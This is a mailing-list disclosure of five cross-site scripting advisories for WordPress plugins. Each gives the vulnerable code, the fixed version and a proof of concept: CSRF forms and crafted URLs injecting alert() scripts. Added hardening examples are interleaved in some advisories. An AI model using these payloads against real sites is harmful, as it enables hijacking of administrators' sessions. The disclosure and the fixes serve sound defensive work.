Date: Sat, 19 Nov 2016 11:50:40 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple XSS vulnerabilities affecting five WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.

------------------------------------------------------------------------
Cross-Site Scripting in All In One WP Security & Firewall WordPress
Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the All In One WP
Security & Firewall Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160731-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on the All In One WP Security &
Firewall [2] WordPress Plugin version 4.1.4 - 4.1.9.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in All In One WP Security & Firewall [3]
version 4.2.0.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
All In One WP Security & Firewall [2] is a comprehensive, user-friendly,
all in one security and firewall plugin for WordPress. A Cross-Site
Scripting vulnerability was found in the All In One WP Security &
Firewall Plugin. This issue allows an attacker to perform a wide variety
of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file admin/wp-security-dashboard-menu.php and
is caused by the lack of output encoding on the tab request parameter,
which is written into an HTML attribute without escaping:

<div class="inside">
	<?php
	//Fetch, prepare, sort, and filter our data...
	$locked_ip_list->prepare_items();
	//echo "put table of locked entries here";
	?>
	<form id="tables-filter" method="get" onSubmit="return confirm('Are you sure you want to perform this bulk operation on the selected entries?');">
		<!-- For plugins, we also need to ensure that the form posts back to our current page -->
		<input type="hidden" name="page" value="<?php echo esc_attr($_REQUEST['page']); ?>"/>
		<?php
		if (isset($_REQUEST["tab"])) {
			echo '<input type="hidden" name="tab" value="' . $_REQUEST["tab"] . '" />';
		}
		?>
		<!-- Now we can render the completed list table -->
		<?php $locked_ip_list->display(); ?>
	</form>
</div>

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=aiowpsec&tab=tab3" method="POST">
			<input type="hidden" name="tab" value="&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_all_in_one_wp_security___firewall_wordpress_plugin.html
[2] https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
[3]
https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.zip
------------------------------------------------------------------------
Cross-Site Scripting in Check Email WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Check Email
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0009

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Check Email [2] WordPress Plugin
version 0.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Check Email [3] version 0.5.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Check Email [2] allows you to test if your WordPress installation is
sending emails correctly by sending a test email to an address of your
choice. A Cross-Site Scripting vulnerability was found in the Check
Email WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A Reflected Cross-Site Scripting vulnerability exists in the Check Email
WordPress plugin. This vulnerability allows an attacker to perform any
action with the privileges of the admin user. The affected code is not
protected with an anti-Cross-Site Request Forgery token. Consequently,
it can be exploited by luring the target user into clicking a specially
crafted link or visiting a malicious website (or advertisement).

The vulnerability exists in the file check-email/check-email.php:

132:	echo $_POST["checkemail_mime"];
140:	echo $_POST["checkemail_type"];
148:	echo $_POST["checkemail_from"];
156:	echo $_POST["checkemail_cc"];

The vulnerability can be exploited using specially crafted URL
parameters. In order to exploit this issue the target user must click a
specially crafted link or visit a malicious website (or advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://172.16.52.198/wp-admin/tools.php?page=checkemail" method="POST">
			<input type="hidden" name="checkemail&#95;to" value="" />
			<input type="hidden" name="checkemail&#95;headers" value="custom" />
			<input type="hidden" name="checkemail&#95;mime" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&#32;&#47;&gt;" />
			<input type="hidden" name="checkemail&#95;type" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;2&#41;&#32;&#47;&#37;3" />
			<input type="hidden" name="checkemail&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;3&#41;&#32;&#47;&gt;" />
			<input type="hidden" name="checkemail&#95;cc" value="&quot;&gt;&lt;&#47;textarea&gt;&lt;script&gt;alert&#40;4&#41;&#59;&lt;&#47;script&gt;" />
			<input type="hidden" name="checkemail&#95;break" value="&#92;n" />
			<input type="hidden" name="checkemail&#95;go" value="Send&#32;test&#32;email" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_check_email_wordpress_plugin.html
[2] https://wordpress.org/plugins/check-email/
[3] https://downloads.wordpress.org/plugin/check-email.zip
------------------------------------------------------------------------
Cross-Site Scripting in Huge IT Portfolio Gallery WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Huge IT Portfolio
Gallery WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0009

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Portfolio Gallery [2] version
2.0.77.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Portfolio Gallery [3] version 2.1.11.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Portfolio Gallery [2] is a plugin for adding a specialized portfolio
gallery, a video portfolio gallery, or just a gallery with single
images. A Cross-Site Scripting vulnerability was found in the Huge IT
Portfolio Gallery WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A Reflected Cross-Site Scripting vulnerability exists in the Huge IT
Portfolio Gallery WordPress plugin. This vulnerability allows an
attacker to perform any action with the privileges of the admin user.
The affected code is not protected with an anti-Cross-Site Request
Forgery token. Consequently, it can be exploited by luring the target
user into clicking a specially crafted link or visiting a malicious
website (or advertisement).

The vulnerability exists in the file
.portfolio-gallery/admin/portfolios_views.php (line 804):
<a href="admin.php?page=portfolios_huge_it_portfolio&task=portfolio_video&id=<?php echo $_GET['id']; ?>&TB_iframe=1"
        class="button button-primary add-video-slide thickbox" id="slideup3s" value="iframepop">

The vulnerability can be exploited using a specially crafted ajaxurl URL
parameter. In order to exploit this issue the target user must click a
specially crafted link or visit a malicious website (or advertisement).
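The following is an added example, not code from either advisory or from the plugins themselves, that hardens both patterns shown above: the string tab parameter from the All In One WP Security & Firewall advisory and the numeric id parameter from the Huge IT Portfolio Gallery advisory. The tab allowlist (tab1, tab2, tab3) and the function names are assumptions for illustration; esc_attr(), esc_url(), absint(), sanitize_key(), add_query_arg() and admin_url() are WordPress core functions.

```php
<?php
// Added example (not plugin code). Assumes it runs inside a WordPress admin
// page, where the core escaping helpers used below are available.

// Case 1: the "tab" parameter (All In One WP Security & Firewall).
// $_REQUEST merges GET, POST and cookies, so a cross-site POST can set it,
// which is exactly what the advisory's proof of concept does. Validate the
// value against a fixed allowlist of tab ids, then still encode on output.
function aiowps_example_current_tab( array $request ) {
    $allowed = array( 'tab1', 'tab2', 'tab3' ); // assumed tab ids
    $tab = isset( $request['tab'] ) ? sanitize_key( $request['tab'] ) : 'tab1';
    return in_array( $tab, $allowed, true ) ? $tab : 'tab1';
}

$tab = aiowps_example_current_tab( $_REQUEST );
// Vulnerable original concatenated $_REQUEST["tab"] straight into the
// attribute. Hardened: the value is allowlisted AND attribute-encoded.
echo '<input type="hidden" name="tab" value="' . esc_attr( $tab ) . '" />';

// Case 2: the numeric "id" parameter (Huge IT Portfolio Gallery).
// An id is an integer: coerce it with absint() so no markup can survive,
// then build the URL with add_query_arg() and encode it with esc_url().
function huge_it_example_video_url( $raw_id ) {
    $id  = absint( $raw_id );   // a payload such as "><script> becomes 0
    $url = add_query_arg( array(
        'page'      => 'portfolios_huge_it_portfolio',
        'task'      => 'portfolio_video',
        'id'        => $id,
        'TB_iframe' => 1,
    ), admin_url( 'admin.php' ) );
    return esc_url( $url );
}

// Vulnerable original echoed $_GET['id'] unescaped inside the href.
printf(
    '<a href="%s" class="button button-primary add-video-slide thickbox" id="slideup3s">Video</a>',
    huge_it_example_video_url( isset( $_GET['id'] ) ? $_GET['id'] : 0 )
);
```

Escaping alone would already close the XSS in both cases; the allowlist and the integer coercion are there so that a bad value never reaches the template at all, and so that a later refactor that drops the esc_* call does not silently reopen the hole.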

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=portfolios_huge_it_portfolio&task=portfolio_video&id=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_huge_it_portfolio_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/portfolio-gallery/
[3] https://downloads.wordpress.org/plugin/portfolio-gallery.2.1.11.zip
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability was found in the
Instagram Feed plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a URL provided by an attacker.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0014

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Instagram Feed [2] WordPress
Plugin version 1.4.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Instagram Feed [3] WordPress Plugin version
1.4.7.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Instagram Feed is a WordPress plugin to display beautifully clean,
customizable, and responsive feeds from multiple Instagram accounts. A
persistent Cross-Site Scripting vulnerability was found in the Instagram
Feed plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a URL provided by an attacker.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The settings page of the Instagram Feed plugin does not perform CSRF
checks. It is possible to change all settings in the plugin by making
an authenticated administrator perform a request that changes the
settings (CSRF). It is possible to change the Instagram access token and
id to show images of other users. It is also possible to inject
malicious JavaScript in the Customize section, to perform Persistent
Cross-Site Scripting. Any user visiting the Instagram Feed will be
served the attacker's payload after the CSRF attack.
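As an added example that is not code from Check Email, Instagram Feed or their authors, the following shows the two checks whose absence both advisories describe (the missing anti-CSRF token on the Check Email tool page and the missing CSRF checks on the Instagram Feed settings page), together with output encoding of the values a page reflects back. The function names, the option name example_custom_js and the nonce action and field names are assumptions; wp_nonce_field(), check_admin_referer(), current_user_can(), wp_unslash(), esc_textarea() and esc_html() are WordPress core functions.

```php
<?php
// Added example (not the plugins' code): a settings page whose form is tied
// to the logged-in user's session, so a POST originating from another site
// is rejected before anything is saved. Names below are illustrative.

function example_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    $custom_js = get_option( 'example_custom_js', '' );
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'example_save_settings', 'example_nonce' ); ?>
        <textarea name="custom_js"><?php echo esc_textarea( $custom_js ); ?></textarea>
        <input type="submit" name="submit" value="Save Changes" />
    </form>
    <?php
}

function example_handle_settings_post() {
    if ( ! isset( $_POST['submit'] ) ) {
        return;
    }
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // 2. Nonce check: rejects any request that does not carry the per-user,
    //    per-action token rendered by wp_nonce_field(). A form hosted on an
    //    attacker's site cannot know this value, so the CSRF stops here.
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // 3. Only now is the submitted value stored. A "custom JS" option is
    //    JavaScript by design, so steps 1 and 2 are what make it safe to keep;
    //    a setting with a narrower type would additionally be sanitized
    //    (absint(), sanitize_text_field(), an allowlist) at this point.
    $custom_js = isset( $_POST['custom_js'] ) ? wp_unslash( $_POST['custom_js'] ) : '';
    update_option( 'example_custom_js', $custom_js );
}

// Values a tool page reflects back (the Check Email pattern, where the
// original did echo $_POST["checkemail_mime"] and friends unescaped) are
// encoded for the HTML context they land in.
function example_echo_reflected( $value ) {
    echo esc_html( wp_unslash( $value ) );
}
```

The nonce is what distinguishes a request the administrator meant to send from one a third-party page submitted on their behalf; the capability check is independent of it and protects against lower-privileged accounts, and the output encoding closes the reflected XSS even when the request is legitimate.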

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
Have an authenticated admin visit a webpage with the following form:

<html>
  <body>
    <form action="http://<wordpress site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize" method="POST">
      <input type="hidden" name="sb&#95;instagram&#95;settings&#95;hidden&#95;field" value="Y" />
      <input type="hidden" name="sb&#95;instagram&#95;customize&#95;hidden&#95;field" value="Y" />
      <input type="hidden" name="sb&#95;instagram&#95;width" value="100" />
      <input type="hidden" name="sb&#95;instagram&#95;width&#95;unit" value="&#37;" />
      <input type="hidden" name="sb&#95;instagram&#95;height" value="100" />
      <input type="hidden" name="sb&#95;instagram&#95;height&#95;unit" value="&#37;" />
      <input type="hidden" name="sb&#95;instagram&#95;background" value="&#35;474747" />
      <input type="hidden" name="sb&#95;instagram&#95;sort" value="none" />
      <input type="hidden" name="sb&#95;instagram&#95;num" value="20" />
      <input type="hidden" name="sb&#95;instagram&#95;cols" value="4" />
      <input type="hidden" name="sb&#95;instagram&#95;image&#95;res" value="auto" />
      <input type="hidden" name="sb&#95;instagram&#95;image&#95;padding" value="5" />
      <input type="hidden" name="sb&#95;instagram&#95;image&#95;padding&#95;unit" value="px" />
      <input type="hidden" name="sb&#95;instagram&#95;show&#95;header" value="on" />
      <input type="hidden" name="sb&#95;instagram&#95;header&#95;color" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;show&#95;btn" value="on" />
      <input type="hidden" name="sb&#95;instagram&#95;btn&#95;background" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;btn&#95;text&#95;color" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;btn&#95;text" value="Load&#32;More&#46;&#46;&#46;" />
      <input type="hidden" name="sb&#95;instagram&#95;show&#95;follow&#95;btn" value="on" />
      <input type="hidden" name="sb&#95;instagram&#95;folow&#95;btn&#95;background" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text&#95;color" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text" value="Follow&#32;on&#32;Instagram" />
      <input type="hidden" name="sb&#95;instagram&#95;exclude&#95;words" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;include&#95;words" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;hide&#95;photos" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;block&#95;users" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;custom&#95;css" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;custom&#95;js" value="&#125;&#13;&#10;&#125;&#41;&#59;&lt;&#47;script&gt;&lt;script&gt;alert&#40;1&#41;&#59;&lt;&#47;script&gt;&#13;&#10;" />
      <input type="hidden" name="submit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The Custom JavaScript section will now be saved with the attacker's
JavaScript payload.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html
[2] https://wordpress.org/plugins/instagram-feed/
[3] https://downloads.wordpress.org/plugin/instagram-feed.1.4.7.zip
------------------------------------------------------------------------
Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP Canvas -
Shortcodes WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. This issue can
be exploited by authenticated users with the Contributor or higher role.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0031

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Canvas - Shortcodes [2]
WordPress Plugin version 1.92.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in WP Canvas - Shortcodes [3] WordPress
Plugin version 2.07.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP Canvas - Shortcodes [2] WordPress Plugin provides a number of
shortcodes that can be used in a WordPress post or page. A Cross-Site
Scripting vulnerability was found in the WP Canvas - Shortcodes
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. This issue can be
exploited by authenticated users with the Contributor or higher role.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the lack of validation on the url attribute of
the wc_button shortcode. A Contributor or higher can create a button
with a specially crafted JavaScript payload. When a logged-on user
clicks on this button, the payload will be executed. This bypasses the
unfiltered_html capability of WordPress, which is normally only assigned
to Editors & Administrators.
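The following is an added example, not code from WP Canvas - Shortcodes or its author, showing a wc_button handler that validates the url attribute before rendering it. The handler name and the generated markup are assumptions; shortcode_atts(), esc_url(), esc_attr(), esc_html() and add_shortcode() are WordPress core functions, and esc_url() accepts only the schemes returned by wp_allowed_protocols(), which does not include javascript.

```php
<?php
// Added example (not the plugin's code): a shortcode handler whose url
// attribute is restricted to real link schemes. The attribute names follow
// the proof of concept above; the handler name and markup are assumed.

function example_wc_button_shortcode( $atts, $content = '' ) {
    $atts = shortcode_atts( array(
        'type'     => 'primary',
        'url'      => '',
        'title'    => '',
        'target'   => 'self',
        'position' => 'none',
    ), $atts, 'wc_button' );

    // esc_url() runs the value through wp_kses_bad_protocol() against
    // wp_allowed_protocols() (http, https, mailto, ...) and returns an empty
    // string when the scheme is not on that list. "javascript:alert(1)" is
    // therefore dropped instead of becoming a live link, regardless of who
    // authored the post and whether they hold unfiltered_html.
    $url = esc_url( $atts['url'] );
    if ( '' === $url ) {
        return ''; // refuse to render a button with no safe destination
    }

    $target = ( 'blank' === $atts['target'] ) ? '_blank' : '_self';

    return sprintf(
        '<a class="wc-button wc-button-%s" href="%s" title="%s" target="%s">%s</a>',
        esc_attr( $atts['type'] ),
        $url,
        esc_attr( $atts['title'] ),
        esc_attr( $target ),
        esc_html( $content )
    );
}
add_shortcode( 'wc_button', 'example_wc_button_shortcode' );
```

The point of validating in the handler rather than relying on post content filtering is that shortcode attributes are stored verbatim and only expanded at render time, so WordPress's unfiltered_html distinction does not protect the reader from what a Contributor placed inside the shortcode.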

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
[wc_button type="primary" url="javascript:alert(1)" title="Visit Site"
target="self" position="float"]Sample Content[/wc_button]
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html
[2] https://wordpress.org/plugins/wc-shortcodes/
[3] https://downloads.wordpress.org/plugin/wc-shortcodes.zip
